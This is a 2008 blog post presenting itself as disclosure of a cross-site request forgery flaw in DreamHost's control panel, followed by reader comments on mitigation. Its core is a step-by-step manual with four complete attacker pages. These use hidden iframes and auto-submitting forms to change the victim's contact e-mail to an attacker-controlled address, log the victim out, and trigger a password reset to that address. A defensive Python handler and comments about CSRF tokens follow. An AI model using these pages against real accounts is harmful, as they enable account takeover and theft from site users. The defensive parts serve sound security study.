How to Steal DreamHost accounts?
I thought a lot before posting this, but in the name of full disclosure..
This is the second time someone has tried this against my DreamHost account, so I guess that it needs to be public.
It will work on any DreamHost customer who is logged in to his account (Note – if you use the logout button, it will not work on your account 🙂 ).
A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purposes and to make DreamHost fix it asap..
A short manual – how to steal DreamHost accounts (I guess that it can be used to steal any account that uses the same defective security mechanism).
So – How?
It is done by sending the mark a link to a page you need to create and host online.
There will be 4 web pages to carry out 3 stages of the attack:
1. Automatically change the contact details in the DreamHost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).
2. Automatically log your mark off from DreamHost’s control panel.
3. Request a new password from DreamHost to the new e-mail address.
The first page (let’s call it start.php):
<html>
<META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
<a1>This page can not be found</a1>
<iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
<iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
</iframe>
</html>
As you can see, this page loads two iframes at 0.1% height and width so the mark can’t see them.
info.php:
<html>
<body>
<form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
<input type=hidden name=tab value="contact">
<input type=hidden name="command" value="submit_edit">
<tr valign=top>
<td id=txt align=right><b>Name:</b></td>
<td><select name="prefix" id=frm>
<option value=""></option>
</select>
<input name="first" value="somename" size="8" id=frm>
<input name="middle" size="1" id=frm>
<input name="last" value="somefamily" size="8" id=frm>
<select name="suffix" id=frm>
<option value=""></option>
</select>
</td>
</tr>
<tr valign=top>

<td id=txt align=right><b>Address:</b></td>
<td><input name="street1" value="somestreet" size=30 id=frm><br>
<input name="street2" size=30 id=frm><br>
<input name="city" value="somecity" size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
</select>
</td>
</tr>
<tr valign=top>
<td id=txt align=right><b>Email:</b></td>
<td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
</tr>
<tr>
<td id=txt align=right><b>Phone:</b></td>
<td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
</tr>
<tr>
<td id=txt align=right><b>Fax:</b>*</td>
<td><input name="fax" size=30 id=frm></td>
</tr>
<tr>
<td id=txt align=right><b>IM:</b>*</td>
<td><input name="chat" size=30 id=frm></td>
</tr>
<tr>
<td id=txt align=right><b>URL:</b>*</td>
<td><input name="url" size=30 id=frm></td>
</tr>
<tr>
<td></td>
<td id=txt>*optional information</td>
</tr>
<tr>
<td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
</tr>
</form>
<script>
document.asd.submit();
</script>
<iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
</iframe>
</body>
</html>
As you can see – this page auto-submits the form, which changes the mark’s DreamHost control panel details to whatever you want, and then loads info3.php.
info3.php:
<html>
<iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
</iframe>
<iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
</html>
As you can see – info3.php does two things:
1. Logs your mark off from the DreamHost control panel.
2. Loads info2.html.
info2.html:
<html>
<body onload="document.getElementById('2').submit()">
<form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
<input type="hidden" name="return_url" value="" />
<input type="hidden" name="email_pwd_submitted" value="1" />
<input name="email" class="text" value="somemail@somedomain.com">
<input type="submit" class="button" value="Email me my password!">
</form>
</body>
</html>
This last step sends a forgotten-password notice to the new e-mail address.
That’s it – 4 pages and you can get any DreamHost account..
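To show what the missing server-side check looks like, here is an added example of a minimal "change contact details" handler written from the defender's side. It is not code from this post and not DreamHost's code; the panel origin, the in-memory account store, the field names csrf_token and current_password, and all sample values are assumptions. It rejects an auto-submitted form like the one above in three independent ways: the request's Origin/Referer is not the panel's, it carries no session-bound anti-CSRF token, and an e-mail change without the current password is refused.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed origin of the control panel (constructed for this example).
PANEL_ORIGIN = "https://panel.example.com"

# Server-side key for deriving per-session CSRF tokens. Generated fresh here;
# a real deployment would keep a persistent, protected key.
CSRF_KEY = secrets.token_bytes(32)

# Hypothetical in-memory stores standing in for the panel's database.
SESSIONS = {}  # session id -> account id
ACCOUNTS = {}  # account id -> {"email", "pw_salt", "pw_hash"}


def hash_password(password, salt):
    """PBKDF2 hash used for the current-password re-entry check."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def create_account(account_id, email, password):
    salt = secrets.token_bytes(16)
    ACCOUNTS[account_id] = {"email": email, "pw_salt": salt,
                            "pw_hash": hash_password(password, salt)}


def login(account_id):
    """Start a session and return its id (what the session cookie would carry)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = account_id
    return sid


def csrf_token_for(session_id):
    """Token the panel embeds as a hidden field in its own contact form.

    It is an HMAC of the session id, so a third-party page cannot compute it
    (the browser never exposes the session cookie to that page) and a token
    from one session is useless in another.
    """
    return hmac.new(CSRF_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(url):
    """Exact scheme+host comparison; a prefix check would accept look-alike hosts."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" == PANEL_ORIGIN


def account_email(account_id):
    return ACCOUNTS[account_id]["email"]


def handle_contact_update(session_id, headers, form):
    """Handler for the contact-details 'submit_edit' action.

    headers and form are plain dicts of request headers and POST fields.
    Returns (accepted, reason).
    """
    account_id = SESSIONS.get(session_id)
    if account_id is None:
        return False, "no valid session"

    # Check 1: the request must originate from the panel itself. A form
    # auto-submitted from another site carries that site's Origin/Referer.
    source = headers.get("Origin") or headers.get("Referer") or ""
    if not same_origin(source):
        return False, "cross-origin request rejected"

    # Check 2: session-bound anti-CSRF token, compared in constant time.
    presented = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(csrf_token_for(session_id).encode(), presented):
        return False, "missing or invalid CSRF token"

    # Check 3: the e-mail address drives password resets, so changing it
    # additionally requires the current password.
    acct = ACCOUNTS[account_id]
    new_email = form.get("email", acct["email"])
    if new_email != acct["email"]:
        supplied = hash_password(form.get("current_password", ""), acct["pw_salt"])
        if not hmac.compare_digest(supplied, acct["pw_hash"]):
            return False, "e-mail change requires the current password"
        acct["email"] = new_email
    return True, "contact details updated"


if __name__ == "__main__":
    create_account("victim", "victim@example.com", "correct horse battery")
    sid = login("victim")
    # Forged submission shaped like the auto-submitting form above:
    # foreign origin, no token, no password.
    print(handle_contact_update(sid, {"Origin": "http://somedomain.com"},
                                {"tab": "contact", "command": "submit_edit",
                                 "email": "somemail@somedomain.com"}))
    # Legitimate submission from the panel's own form.
    print(handle_contact_update(sid, {"Origin": PANEL_ORIGIN},
                                {"email": "new@example.com",
                                 "csrf_token": csrf_token_for(sid),
                                 "current_password": "correct horse battery"}))
```

The token check is the one that actually closes the hole; the origin check is defence in depth (browsers may omit Referer, so it should never be the only control), and the password re-entry limits damage if a token ever leaks. The same treatment applies to the other two requests the attack relies on: a logout that changes state over a plain GET URL and a password-reset form that accepts any e-mail address should both require a POST with a token, and marking the session cookie SameSite keeps it off cross-site form posts entirely.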
June 17th, 2008 at 5:29 am
[…] http://guymizrahi.com/2008/06/14/how-to-steal-dreamhost-accounts
June 17th, 2008 at 10:20 am
Well, this method isn’t new..
It is called XSRF (cross-site request forgery).
I really like this sec hole cuz almost every site has it; it is very difficult to secure.
July 4th, 2008 at 1:26 pm
L[s]D – it’s not so difficult to secure that. You just need to make sure that every user who wants to make changes to his account must type his password in the form…
July 6th, 2008 at 2:13 pm
You can also add a small text box with a random password that the user needs to fill in.
July 8th, 2008 at 12:24 pm
I think you are all missing the point here.
It is obvious you can secure this operation (change details) in many different ways.
The point is that DreamHost didn’t think that there is a need to secure it.
That is what’s bothering me.
July 10th, 2008 at 12:20 am
I think that CSRF is very easy to secure; one way is to create a security_token,
and this is the best security from CSRF…